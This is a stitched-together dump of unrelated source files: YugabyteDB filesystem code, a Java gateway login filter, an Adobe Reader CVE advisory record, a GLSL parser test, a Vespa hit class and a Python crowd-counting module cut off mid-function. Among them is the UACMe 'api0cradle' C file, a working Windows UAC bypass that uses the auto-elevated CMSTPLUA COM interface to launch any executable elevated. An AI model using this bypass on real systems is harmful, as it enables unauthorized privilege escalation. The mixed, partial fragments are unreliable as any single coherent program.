RETURN_NOT_OK(DeleteLockFiles());
return Status::OK();
}
Status FsManager::CreateFileSystemRoots(const InstanceMetadataPB& metadata,
bool create_lock) {
// In the event of failure, delete everything we created.
std::deque<ScopedFileDeleter> delete_on_failure;
unordered_set<string> to_sync;
std::set<std::string> roots = canonicalized_data_fs_roots_;
roots.insert(canonicalized_wal_fs_roots_.begin(), canonicalized_wal_fs_roots_.end());
// All roots are either empty or non-existent. Create missing roots and all
// subdirectories.
for (const auto& root : roots) {
bool created;
std::string out_dir;
RETURN_NOT_OK(SetupRootDir(env_, root, server_type_, &out_dir, &created));
if (created) {
delete_on_failure.emplace_front(env_, out_dir);
to_sync.insert(DirName(out_dir));
}
const string lock_file_path = GetFsLockFilePath(root);
if (create_lock && !Exists(lock_file_path)) {
std::unique_ptr<WritableFile> file;
RETURN_NOT_OK_PREPEND(env_->NewWritableFile(lock_file_path, &file),
"Unable to create lock file.");
// Do not delete lock file on error. It is used to detect failed initial create.
}
const string instance_metadata_path = GetInstanceMetadataPath(root);
if (env_->FileExists(instance_metadata_path)) {
continue;
}
RETURN_NOT_OK_PREPEND(WriteInstanceMetadata(metadata, instance_metadata_path),
"Unable to write instance metadata");
delete_on_failure.emplace_front(env_, instance_metadata_path);
}
for (const auto& dir : GetAncillaryDirs()) {
bool created;
RETURN_NOT_OK_PREPEND(CreateDirIfMissing(dir, &created),
Substitute("Unable to create directory $0", dir));
if (created) {
delete_on_failure.emplace_front(env_, dir);
to_sync.insert(DirName(dir));
}
}
// Ensure newly created directories are synchronized to disk.
if (FLAGS_enable_data_block_fsync) {
for (const string& dir : to_sync) {
RETURN_NOT_OK_PREPEND(env_->SyncDir(dir),
Substitute("Unable to synchronize directory $0", dir));
}
}
// Success: don't delete any files.
for (auto& deleter : delete_on_failure) {
deleter.Cancel();
}
return Status::OK();
}
std::set<std::string> FsManager::GetAncillaryDirs() const {
std::set<std::string> ancillary_dirs;
AppendValues(GetRaftGroupMetadataDirs(), &ancillary_dirs);
AppendValues(GetConsensusMetadataDirs(), &ancillary_dirs);
for (const auto& wal_fs_root : canonicalized_wal_fs_roots_) {
ancillary_dirs.emplace(WalDir(wal_fs_root, server_type_));
}
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
const string data_dir = DataDir(data_fs_root, server_type_);
ancillary_dirs.emplace(data_dir);
ancillary_dirs.emplace(JoinPathSegments(data_dir, kRocksDBDirName));
}
return ancillary_dirs;
}
void FsManager::CreateInstanceMetadata(InstanceMetadataPB* metadata) {
if (!FLAGS_instance_uuid_override.empty()) {
metadata->set_uuid(FLAGS_instance_uuid_override);
} else {
metadata->set_uuid(GenerateObjectId());
}
string time_str;
StringAppendStrftime(&time_str, "%Y-%m-%d %H:%M:%S", time(nullptr), false);
string hostname;
if (!GetHostname(&hostname).ok()) {
hostname = "<unknown host>";
}
metadata->set_format_stamp(Substitute("Formatted at $0 on $1", time_str, hostname));
}
Status FsManager::WriteInstanceMetadata(const InstanceMetadataPB& metadata,
const string& path) {
// The instance metadata is written effectively once per TS, so the
// durability cost is negligible.
RETURN_NOT_OK(pb_util::WritePBContainerToPath(env_, path,
metadata,
pb_util::NO_OVERWRITE,
pb_util::SYNC));
LOG(INFO) << "Generated new instance metadata in path " << path << ":\n"
<< metadata.DebugString();
return Status::OK();
}
Status FsManager::IsDirectoryEmpty(const string& path, bool* is_empty) {
vector<string> children;
RETURN_NOT_OK(env_->GetChildren(path, &children));
for (const string& child : children) {
// Excluding logs directory from the list of things to check for.
if (child == "." || child == ".." || child == kLogsDirName) {
continue;
} else {
LOG(INFO) << "Found data " << child;
*is_empty = false;
return Status::OK();
}
}
*is_empty = true;
return Status::OK();
}
Status FsManager::CheckWrite(const std::string& root) {
RETURN_NOT_OK(env_->CreateDirs(root));
const string tmp_file_temp = JoinPathSegments(root, kCheckFileTemplate);
string tmp_file;
std::unique_ptr<WritableFile> file;
Status write_result = env_->NewTempWritableFile(WritableFileOptions(),
tmp_file_temp,
&tmp_file,
&file);
if (!write_result.ok()) {
return write_result;
}
ScopedFileDeleter deleter(env_, tmp_file);
write_result = file->Append(Slice("0123456789"));
if (!write_result.ok()) {
return write_result;
}
write_result = file->Close();
if (!write_result.ok()) {
return write_result;
}
return Status::OK();
}
void FsManager::CreateAndSetFaultDriveMetric(const std::string& path) {
MetricEntity::AttributeMap attrs;
attrs["drive_path"] = path;
auto metric_entity = METRIC_ENTITY_drive.Instantiate(metric_registry_,
kPrefixMetricId + path,
attrs);
METRIC_drive_fault.Instantiate(metric_entity)->Increment();
}
Status FsManager::CreateDirIfMissing(const string& path, bool* created) {
return env_util::CreateDirIfMissing(env_, path, created);
}
Status FsManager::CreateDirIfMissingAndSync(const std::string& path, bool* created) {
RETURN_NOT_OK_PREPEND(CreateDirIfMissing(path, created),
Substitute("Failed to create directory $0", path));
RETURN_NOT_OK_PREPEND(env_->SyncDir(DirName(path)),
Substitute("Failed to sync root directory $0", DirName(path)));
return Status::OK();
}
const string& FsManager::uuid() const {
return CHECK_NOTNULL(metadata_.get())->uuid();
}
set<string> FsManager::GetFsRootDirs() const {
return canonicalized_all_fs_roots_;
}
vector<string> FsManager::GetDataRootDirs() const {
// Add the data subdirectory to each data root.
vector<string> data_paths;
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(DataDir(data_fs_root, server_type_));
}
return data_paths;
}
vector<string> FsManager::GetWalRootDirs() const {
DCHECK(initted_);
vector<string> wal_dirs;
for (const auto& canonicalized_wal_fs_root : canonicalized_wal_fs_roots_) {
wal_dirs.push_back(WalDir(canonicalized_wal_fs_root, server_type_));
}
return wal_dirs;
}
std::string FsManager::GetRaftGroupMetadataDir(const std::string& data_dir) {
return JoinPathSegments(data_dir, kRaftGroupMetadataDirName);
}
vector<string> FsManager::GetRaftGroupMetadataDirs() const {
DCHECK(initted_);
vector<string> data_paths;
data_paths.reserve(canonicalized_data_fs_roots_.size());
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(GetRaftGroupMetadataDir(
GetServerTypeDataPath(data_fs_root, server_type_)));
}
return data_paths;
}
Result<std::string> FsManager::GetRaftGroupMetadataPath(const string& tablet_id) const {
return JoinPathSegments(GetRaftGroupMetadataDir(VERIFY_RESULT(GetTabletPath(tablet_id))),
tablet_id);
}
void FsManager::SetTabletPathByDataPath(const string& tablet_id, const string& path) {
string tablet_path = path.empty() ? GetDefaultRootDir() : DirName(path);
std::lock_guard<std::mutex> lock(data_mutex_);
InsertOrUpdate(&tablet_id_to_path_, tablet_id, tablet_path);
}
Result<std::string> FsManager::GetTabletPath(const std::string &tablet_id) const {
std::lock_guard<std::mutex> lock(data_mutex_);
  auto tablet_path_it = tablet_id_to_path_.find(tablet_id);
  if (tablet_path_it == tablet_id_to_path_.end()) {
    return STATUS(NotFound, Format("Metadata dir not found for tablet $0", tablet_id));
  }
  return tablet_path_it->second;
}
bool FsManager::LookupTablet(const std::string &tablet_id) {
for (const auto& dir : GetRaftGroupMetadataDirs()) {
if (env_->FileExists(JoinPathSegments(dir, tablet_id))) {
std::lock_guard<std::mutex> lock(data_mutex_);
tablet_id_to_path_.insert({tablet_id, DirName(dir)});
return true;
}
}
return false;
}
namespace {
// Return true if 'fname' is a valid tablet ID.
bool IsValidTabletId(const std::string& fname) {
if (fname.find(kTmpInfix) != string::npos) {
LOG(WARNING) << "Ignoring tmp file in tablet metadata dir: " << fname;
return false;
}
if (HasPrefixString(fname, ".")) {
// Hidden file or ./..
VLOG(1) << "Ignoring hidden file in tablet metadata dir: " << fname;
return false;
}
return true;
}
} // anonymous namespace
Result<std::vector<std::string>> FsManager::ListTabletIds() {
std::lock_guard<std::mutex> lock(data_mutex_);
std::vector<std::string> tablet_ids;
for (const auto& dir : GetRaftGroupMetadataDirs()) {
vector<string> children;
RETURN_NOT_OK_PREPEND(ListDir(dir, &children),
Substitute("Couldn't list tablets in metadata directory $0", dir));
for (const string& child : children) {
if (!IsValidTabletId(child)) {
continue;
}
tablet_id_to_path_.emplace(child, DirName(dir));
tablet_ids.push_back(child);
}
}
return tablet_ids;
}
std::string FsManager::GetInstanceMetadataPath(const string& root) const {
return JoinPathSegments(GetServerTypeDataPath(root, server_type_), kInstanceMetadataFileName);
}
std::string FsManager::GetFsLockFilePath(const string& root) const {
return JoinPathSegments(GetServerTypeDataPath(root, server_type_), kFsLockFileName);
}
std::string FsManager::GetDefaultRootDir() const {
DCHECK(initted_);
return GetServerTypeDataPath(canonicalized_default_fs_root_, server_type_);
}
std::string FsManager::GetCertsDir(const std::string& root_dir) {
return JoinPathSegments(root_dir, kSecureCertsDirName);
}
std::vector<std::string> FsManager::GetConsensusMetadataDirs() const {
DCHECK(initted_);
vector<string> data_paths;
data_paths.reserve(canonicalized_data_fs_roots_.size());
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(GetConsensusMetadataDir(
GetServerTypeDataPath(data_fs_root, server_type_)));
}
return data_paths;
}
std::string FsManager::GetConsensusMetadataDir(const std::string& data_dir) {
return JoinPathSegments(data_dir, kConsensusMetadataDirName);
}
Result<std::string> FsManager::GetConsensusMetadataPath(const std::string &tablet_id) const {
return JoinPathSegments(GetConsensusMetadataDir(VERIFY_RESULT(GetTabletPath(tablet_id))),
tablet_id);
}
std::string FsManager::GetFirstTabletWalDirOrDie(const std::string& table_id,
const std::string& tablet_id) const {
auto wal_root_dirs = GetWalRootDirs();
CHECK(!wal_root_dirs.empty()) << "No WAL directories specified";
auto table_wal_dir = JoinPathSegments(wal_root_dirs[0], Substitute("table-$0", table_id));
return JoinPathSegments(table_wal_dir, Substitute("tablet-$0", tablet_id));
}
std::string FsManager::GetTabletWalRecoveryDir(const string& tablet_wal_path) {
return tablet_wal_path + kWalsRecoveryDirSuffix;
}
namespace {
const auto kWalFileNameFullPrefix = std::string(FsManager::kWalFileNamePrefix) + "-";
} // namespace
std::string FsManager::GetWalSegmentFileName(uint64_t sequence_number) {
return Format("$0$1", kWalFileNameFullPrefix, StringPrintf("%09" PRIu64, sequence_number));
}
bool FsManager::IsWalSegmentFileName(const std::string& file_name) {
return boost::starts_with(file_name, kWalFileNameFullPrefix);
}
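// Illustrative example, assuming FsManager::kWalFileNamePrefix is "wal" (an assumption; the
// constant is defined elsewhere): GetWalSegmentFileName(7) yields "wal-000000007", and
// IsWalSegmentFileName("wal-000000007") returns true.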
// ==========================================================================
// Dump/Debug utils
// ==========================================================================
void FsManager::DumpFileSystemTree(ostream& out) {
DCHECK(initted_);
for (const string& root : canonicalized_all_fs_roots_) {
out << "File-System Root: " << root << std::endl;
std::vector<string> objects;
Status s = env_->GetChildren(root, &objects);
if (!s.ok()) {
LOG(ERROR) << "Unable to list the fs-tree: " << s.ToString();
return;
}
DumpFileSystemTree(out, "|-", root, objects);
}
}
void FsManager::DumpFileSystemTree(ostream& out, const string& prefix,
const string& path, const vector<string>& objects) {
for (const string& name : objects) {
if (name == "." || name == "..") continue;
std::vector<string> sub_objects;
string sub_path = JoinPathSegments(path, name);
Status s = env_->GetChildren(sub_path, &sub_objects);
if (s.ok()) {
out << prefix << name << "/" << std::endl;
DumpFileSystemTree(out, prefix + "---", sub_path, sub_objects);
} else {
out << prefix << name << std::endl;
}
}
}
Result<std::vector<std::string>> FsManager::ListDir(const std::string& path) const {
std::vector<std::string> result;
RETURN_NOT_OK(env_->GetChildren(path, ExcludeDots::kTrue, &result));
return result;
}
Status FsManager::ListDir(const std::string& path, std::vector<std::string> *objects) const {
return env_->GetChildren(path, objects);
}
} // namespace yb
| 11,039 |
4,487 | <filename>Source/Akagi/methods/api0cradle.c
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2020
*
* TITLE: API0CRADLE.C
*
* VERSION: 3.50
*
* DATE: 11 Oct 2020
*
* UAC bypass method from Oddvar Moe aka api0cradle.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmCMLuaUtilShellExecMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmCMLuaUtilShellExecMethod(
_In_ LPWSTR lpszExecutable
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
BOOL bApprove = FALSE;
ICMLuaUtil* CMLuaUtil = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//
// Potential fix check.
//
if (supIsConsentApprovedInterface(T_CLSID_CMSTPLUA, &bApprove)) {
if (bApprove == FALSE) {
MethodResult = STATUS_NOINTERFACE;
break;
}
}
r = ucmAllocateElevatedObject(
T_CLSID_CMSTPLUA,
&IID_ICMLuaUtil,
CLSCTX_LOCAL_SERVER,
(void**)&CMLuaUtil);
if (r != S_OK)
break;
if (CMLuaUtil == NULL) {
r = E_OUTOFMEMORY;
break;
}
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
lpszExecutable,
NULL,
NULL,
SEE_MASK_DEFAULT,
SW_SHOW);
if (SUCCEEDED(r))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
| 1,015 |
697 | <filename>leyou-api-gateway/src/main/java/com/leyou/filter/LoginFilter.java
package com.leyou.filter;
import com.leyou.auth.utils.JwtUtils;
import com.leyou.config.FilterProperties;
import com.leyou.config.JwtProperties;
import com.leyou.utils.CookieUtils;
import com.netflix.zuul.ZuulFilter;
import com.netflix.zuul.context.RequestContext;
import com.netflix.zuul.exception.ZuulException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Component;
import javax.servlet.http.HttpServletRequest;
import java.util.Arrays;
import java.util.List;
/**
 * @Author: 98050
 * @Time: 2018-10-24 16:21
 * @Feature: Login filter
 */
@Component
//@EnableConfigurationProperties({JwtProperties.class,FilterProperties.class})
public class LoginFilter extends ZuulFilter {
@Autowired
private JwtProperties properties;
@Autowired
private FilterProperties filterProperties;
private static final Logger logger = LoggerFactory.getLogger(LoginFilter.class);
@Override
public String filterType() {
return "pre";
}
@Override
public int filterOrder() {
return 5;
}
@Override
public boolean shouldFilter() {
        // 1. Get the request context
        RequestContext context = RequestContext.getCurrentContext();
        // 2. Get the request
        HttpServletRequest request = context.getRequest();
        // 3. Get the request URI
        String requestUri = request.getRequestURI();
        logger.info(requestUri);
        // 4. Check it against the whitelist
        return !isAllowPath(requestUri);
}
private boolean isAllowPath(String requestUri) {
        // 1. Define a flag
        boolean flag = false;
        // 2. Iterate over the allowed paths
List<String> paths = Arrays.asList(this.filterProperties.getAllowPaths().split(" "));
for (String path : paths){
if (requestUri.startsWith(path)){
flag = true;
break;
}
}
return flag;
}
@Override
public Object run() throws ZuulException {
        // 1. Get the request context
        RequestContext context = RequestContext.getCurrentContext();
        // 2. Get the request
        HttpServletRequest request = context.getRequest();
        // 3. Get the token
        String token = CookieUtils.getCookieValue(request,this.properties.getCookieName());
        // 4. Validate the token
        try{
            // 4.1 Validation passed, let the request through
            JwtUtils.getInfoFromToken(token,this.properties.getPublicKey());
        }catch (Exception e){
            // 4.2 Validation failed, return 403
            context.setSendZuulResponse(false);
context.setResponseStatusCode(HttpStatus.FORBIDDEN.value());
}
return null;
}
}
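/*
 * Illustrative configuration sketch (the property names below are assumptions based on the
 * JwtProperties/FilterProperties fields used above, not verified against this project):
 *
 *   ly.jwt.cookieName=LY_TOKEN
 *   ly.filter.allowPaths=/api/auth /api/search /api/item
 *
 * Note that isAllowPath() splits allowPaths on a single space character.
 */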
| 1,260 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-gxgp-2885-hjmh",
"modified": "2022-05-13T01:06:43Z",
"published": "2022-05-13T01:06:43Z",
"aliases": [
"CVE-2015-5583"
],
"details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended sandbox restrictions and obtain sensitive PDF information by launching a print job on a remote printer, a different vulnerability than CVE-2015-6705, CVE-2015-6706, and CVE-2015-7624.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5583"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/acrobat/apsb15-24.html"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1033796"
},
{
"type": "WEB",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-468"
}
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 528 |
676 | <filename>app/src/main/java/core/issue/IssuesService.java<gh_stars>100-1000
package core.issue;
import core.issues.Issue;
import java.util.List;
import java.util.Map;
import retrofit2.Call;
import retrofit2.http.GET;
import retrofit2.http.Path;
import retrofit2.http.QueryMap;
public interface IssuesService {
@GET("/repos/{owner}/{name}/issues?sort=updated")
Call<List<Issue>> issues(@Path("owner") String owner, @Path("name") String repo, @QueryMap Map<String, String> filter);
@GET("/repos/{owner}/{name}/issues?sort=updated")
Call<List<Issue>> issues(@Path("owner") String owner, @Path("name") String repo, @QueryMap Map<String, String> filter,
                           @retrofit2.http.Query("page") int page);
}
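// Illustrative usage sketch (the base URL and converter choice are assumptions, not part of
// this interface):
//
//   IssuesService service = new Retrofit.Builder()
//       .baseUrl("https://api.github.com")
//       .addConverterFactory(GsonConverterFactory.create())
//       .build()
//       .create(IssuesService.class);
//   Call<List<Issue>> call = service.issues("owner", "repo", Collections.singletonMap("state", "open"));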
| 248 |
476 | <filename>resources/nn/custom_model/handler.py
import cv2
import numpy as np
from depthai_sdk import frameNorm
def decode(nnManager, packet):
bboxes = np.array(packet.getFirstLayerFp16())
bboxes = bboxes.reshape((bboxes.size // 7, 7))
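    # Each row is assumed to follow the common OpenVINO SSD detection layout:
    # [image_id, label, confidence, x_min, y_min, x_max, y_max], with coordinates normalized to 0..1.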
bboxes = bboxes[bboxes[:, 2] > 0.5]
labels = bboxes[:, 1].astype(int)
confidences = bboxes[:, 2]
bboxes = bboxes[:, 3:7]
return {
"labels": labels,
"confidences": confidences,
"bboxes": bboxes
}
decoded = ["unknown", "face"]
def draw(nnManager, data, frames):
for name, frame in frames:
if name == nnManager.source:
for label, conf, raw_bbox in zip(*data.values()):
bbox = frameNorm(frame, raw_bbox)
cv2.rectangle(frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 0, 0), 2)
cv2.putText(frame, decoded[label], (bbox[0] + 10, bbox[1] + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"{int(conf * 100)}%", (bbox[0] + 10, bbox[1] + 40), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
| 521 |
2,231 | <gh_stars>1000+
// Copyright 2020 The Defold Foundation
// Licensed under the Defold License version 1.0 (the "License"); you may not use
// this file except in compliance with the License.
//
// You may obtain a copy of the License, together with FAQs at
// https://www.defold.com/license
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
#include <string.h>
#define JC_TEST_IMPLEMENTATION
#include <jc_test/jc_test.h>
#include "graphics.h"
#include "null/glsl_uniform_parser.h"
class dmGLSLUniformTest : public jc_test_base_class
{
protected:
virtual void SetUp()
{
}
virtual void TearDown()
{
}
};
struct Uniform
{
const char* m_Name;
uint32_t m_Length;
dmGraphics::Type m_Type;
};
static void UniformCallback(const char* name, uint32_t name_length, dmGraphics::Type type, uintptr_t userdata)
{
Uniform* uniform = (Uniform*)userdata;
uniform->m_Name = name;
uniform->m_Length = name_length;
uniform->m_Type = type;
}
#define ASSERT_TYPE(type_name, type)\
{\
Uniform uniform;\
const char* program = "uniform mediump " type_name " " type_name ";\n";\
bool result = dmGraphics::GLSLUniformParse(program, UniformCallback, (uintptr_t)&uniform);\
ASSERT_TRUE(result);\
ASSERT_EQ(0, strncmp(type_name, uniform.m_Name, strnlen(type_name, uniform.m_Length)));\
ASSERT_EQ(dmGraphics::TYPE_##type, uniform.m_Type);\
}
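// For example, ASSERT_TYPE("vec4", FLOAT_VEC4) feeds the parser the single line
// "uniform mediump vec4 vec4;\n" and expects the reported type to be TYPE_FLOAT_VEC4.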
TEST_F(dmGLSLUniformTest, Types)
{
ASSERT_TYPE("int", INT);
ASSERT_TYPE("uint", UNSIGNED_INT);
ASSERT_TYPE("float", FLOAT);
ASSERT_TYPE("vec4", FLOAT_VEC4);
ASSERT_TYPE("mat4", FLOAT_MAT4);
ASSERT_TYPE("sampler2D", SAMPLER_2D);
}
TEST_F(dmGLSLUniformTest, IntroductionJunk)
{
Uniform uniform;
const char* program = ""
"varying mediump vec4 position;\n"
"varying mediump vec2 var_texcoord0;\n"
"uniform lowp sampler2D texture_sampler;\n";
bool result = dmGraphics::GLSLUniformParse(program, UniformCallback, (uintptr_t)&uniform);
ASSERT_TRUE(result);
ASSERT_EQ(0, strncmp("texture_sampler", uniform.m_Name, strnlen("texture_sampler", uniform.m_Length)));
ASSERT_EQ(dmGraphics::TYPE_SAMPLER_2D, uniform.m_Type);
}
int main(int argc, char **argv)
{
jc_test_init(&argc, argv);
return jc_test_run_all();
}
| 1,082 |
4,054 | // Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.searchlib.aggregation;
import com.yahoo.text.Utf8;
import com.yahoo.vespa.objects.Deserializer;
import com.yahoo.vespa.objects.ObjectVisitor;
import com.yahoo.vespa.objects.Serializer;
public class VdsHit extends Hit {
public static final int classId = registerClass(0x4000 + 96, VdsHit.class);
private String docId = "";
private RawData summary = new RawData();
@SuppressWarnings("UnusedDeclaration")
public VdsHit() {
        // used by the deserializer
}
/**
* Create a hit with the given path and document id.
*
     * @param summary The summary blob in standard fs4 coding.
* @param docId The local document id.
* @param rank The rank of this hit.
*/
public VdsHit(String docId, byte[] summary, double rank) {
super(rank);
this.docId = docId;
this.summary = new RawData(summary);
}
/**
* Obtain the summary blob for this hit.
*
* @return The summary blob.
*/
public RawData getSummary() {
return summary;
}
/**
* Obtain the local document id of this hit.
*
* @return The local document id.
*/
public String getDocId() {
return docId;
}
@Override
protected int onGetClassId() {
return classId;
}
@Override
protected void onSerialize(Serializer buf) {
super.onSerialize(buf);
byte[] utf8 = Utf8.toBytes(docId);
buf.putInt(null, utf8.length);
buf.put(null, utf8);
summary.serialize(buf);
}
@Override
protected void onDeserialize(Deserializer buf) {
super.onDeserialize(buf);
docId = getUtf8(buf);
summary.deserialize(buf);
}
@Override
public int hashCode() {
return super.hashCode() + docId.hashCode() + summary.hashCode();
}
@Override
public boolean equals(Object obj) {
VdsHit rhs = (VdsHit)obj;
return super.equals(obj) &&
docId.equals(rhs.docId) &&
summary.equals(rhs.summary);
}
@Override
public void visitMembers(ObjectVisitor visitor) {
super.visitMembers(visitor);
visitor.visit("docId", docId);
visitor.visit("summary", summary);
}
}
| 979 |
533 | from insomniac import activation_controller
exec(activation_controller.get_extra_feature('filters'))
| 28 |
7,899 | <reponame>muminkoykiran/computervision-recipes
import os
import time
import base64
import urllib
from io import BytesIO
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
from PIL import Image
import tensorflow as tf
import logging
import sys
# dir_path = os.path.dirname(os.path.realpath(__file__))
# sys.path.append(dir_path + "/../third_party/mcnn/src")
# import network
# from crowd_count import CrowdCounter
from crowdcountmcnn.src import network
from crowdcountmcnn.src.crowd_count import CrowdCounter
from abc import ABC, abstractmethod
class CrowdCounting(ABC):
@abstractmethod
def score(self): # pragma: no cover
raise NotImplementedError
class Router(CrowdCounting):
"""Router model definition.
Args:
gpu_id: GPU ID, integer starting from 0.
"""
def __init__(
self,
gpu_id=0,
mcnn_model_path="mcnn_shtechA_660.h5",
cutoff_pose=20,
cutoff_mcnn=50,
):
self._model_openpose = CrowdCountModelPose(gpu_id)
self._model_mcnn = CrowdCountModelMCNN(gpu_id, model_path=mcnn_model_path)
self._cutoff_pose = cutoff_pose
self._cutoff_mcnn = cutoff_mcnn
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
dict_openpose = self._model_openpose.score(
filebytes, return_image, img_dim=img_dim
)
result_openpose = dict_openpose["pred"]
dict_mcnn = self._model_mcnn.score(filebytes, return_image, img_dim=img_dim)
result_mcnn = dict_mcnn["pred"]
self._logger.info("OpenPose results: {}".format(result_openpose))
self._logger.info("MCNN results: {}".format(result_mcnn))
if result_openpose > self._cutoff_pose and result_mcnn > self._cutoff_mcnn:
return dict_mcnn
else:
return dict_openpose
class CrowdCountModelMCNN(CrowdCounting):
"""MCNN model definition.
Args:
gpu_id: GPU ID, integer starting from 0.
"""
def __init__(self, gpu_id=0, model_path="mcnn_shtechA_660.h5"):
# load MCNN
self._net = CrowdCounter()
network.load_net(model_path, self._net)
if gpu_id == -1:
self._net.cpu()
else:
self._net.cuda(gpu_id)
self._net.eval()
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
"""Score an image.
Args:
filebytes: Image in stream.
return_image (optional): Whether a scored image needs to be returned, defaults to False.
img_dim (optional): Max dimension of image, defaults to 1750.
Returns:
A dictionary with number of people in image, timing for steps, and optionally, returned image.
"""
self._logger.info("---started scoring image using MCNN---")
t = time.time()
image = load_jpg(filebytes, img_dim)
t_image_prepare = round(time.time() - t, 3)
self._logger.info("time on preparing image: {} seconds".format(t_image_prepare))
t = time.time()
pred_mcnn, model_output = score_mcnn(self._net, image)
t_score = round(time.time() - t, 3)
self._logger.info("time on scoring image: {} seconds".format(t_score))
result = {}
result["pred"] = int(round(pred_mcnn, 0))
if not return_image:
dict_time = dict(
zip(["t_image_prepare", "t_score"], [t_image_prepare, t_score])
)
else:
t = time.time()
scored_image = draw_image_mcnn(model_output)
t_image_draw = round(time.time() - t, 3)
self._logger.info("time on drawing image: {}".format(t_image_draw))
t = time.time()
scored_image = web_encode_image(scored_image)
t_image_encode = round(time.time() - t, 3)
self._logger.info("time on encoding image: {}".format(t_image_encode))
dict_time = dict(
zip(
["t_image_prepare", "t_score", "t_image_draw", "t_image_encode"],
[t_image_prepare, t_score, t_image_draw, t_image_encode],
)
)
result["image"] = scored_image
# sum up total time
t_total = 0
for k in dict_time:
t_total += dict_time[k]
dict_time["t_total"] = round(t_total, 3)
self._logger.info("total time: {}".format(round(t_total, 3)))
result["time"] = dict_time
self._logger.info("---finished scoring image---")
return result
class CrowdCountModelPose(CrowdCounting):
"""OpenPose model definition.
Args:
gpu_id: GPU ID, integer starting from 0. Set it to -1 to use CPU.
"""
def __init__(self, gpu_id=0):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
config.log_device_placement = True
model = "cmu"
resize = "656x368"
self._w, self._h = model_wh(resize)
self._model = init_model(gpu_id, model, self._w, self._h, config)
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
"""Score an image.
Args:
filebytes: Image in stream.
return_image (optional): Whether a scored image needs to be returned, defaults to False.
img_dim (optional): Max dimension of image, defaults to 1750.
Returns:
A dictionary with number of people in image, timing for steps, and optionally, returned image.
"""
self._logger.info("---started scoring image using OpenPose---")
t = time.time()
img = create_openpose_image(filebytes, img_dim)
t_image_prepare = round(time.time() - t, 3)
self._logger.info("time on preparing image: {} seconds".format(t_image_prepare))
t = time.time()
humans = score_openpose(self._model, img, self._w, self._h)
t_score = round(time.time() - t, 3)
self._logger.info("time on scoring image: {} seconds".format(t_score))
result = {}
result["pred"] = len(humans)
if not return_image:
dict_time = dict(
zip(["t_image_prepare", "t_score"], [t_image_prepare, t_score])
)
else:
t = time.time()
scored_image = draw_image(img, humans)
t_image_draw = round(time.time() - t, 3)
self._logger.info("time on drawing image: {}".format(t_image_draw))
t = time.time()
scored_image = web_encode_image(scored_image)
t_image_encode = round(time.time() - t, 3)
self._logger.info("time on encoding image: {}".format(t_image_encode))
dict_time = dict(
zip(
["t_image_prepare", "t_score", "t_image_draw", "t_image_encode"],
[t_image_prepare, t_score, t_image_draw, t_image_encode],
)
)
result["image"] = scored_image
# sum up total time
t_total = 0
for k in dict_time:
t_total += dict_time[k]
dict_time["t_total"] = round(t_total, 3)
self._logger.info("total time: {}".format(round(t_total, 3)))
result["time"] = dict_time
self._logger.info("---finished scoring image---")
return result
def init_model(gpu_id, model, w, h, config):
"""Initialize model.
Args:
gpu_id: GPU ID.
Returns:
A TensorFlow model object.
"""
# if w == 0 or h == 0:
# w, h = 432, 368
if gpu_id == -1: # pragma: no cover
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
e = TfPoseEstimator(get_graph_path(model), target_size=(w, h), tf_config=config)
else:
with tf.device("/device:GPU:{}".format(gpu_id)):
e = TfPoseEstimator(
get_graph_path(model), target_size=(w, h), tf_config=config
)
return e
def create_openpose_image(filebytes, img_dim):
"""Create image from file bytes.
Args:
filebytes: Image in stream.
img_dim: Max dimension of image.
Returns:
Image in CV2 format.
"""
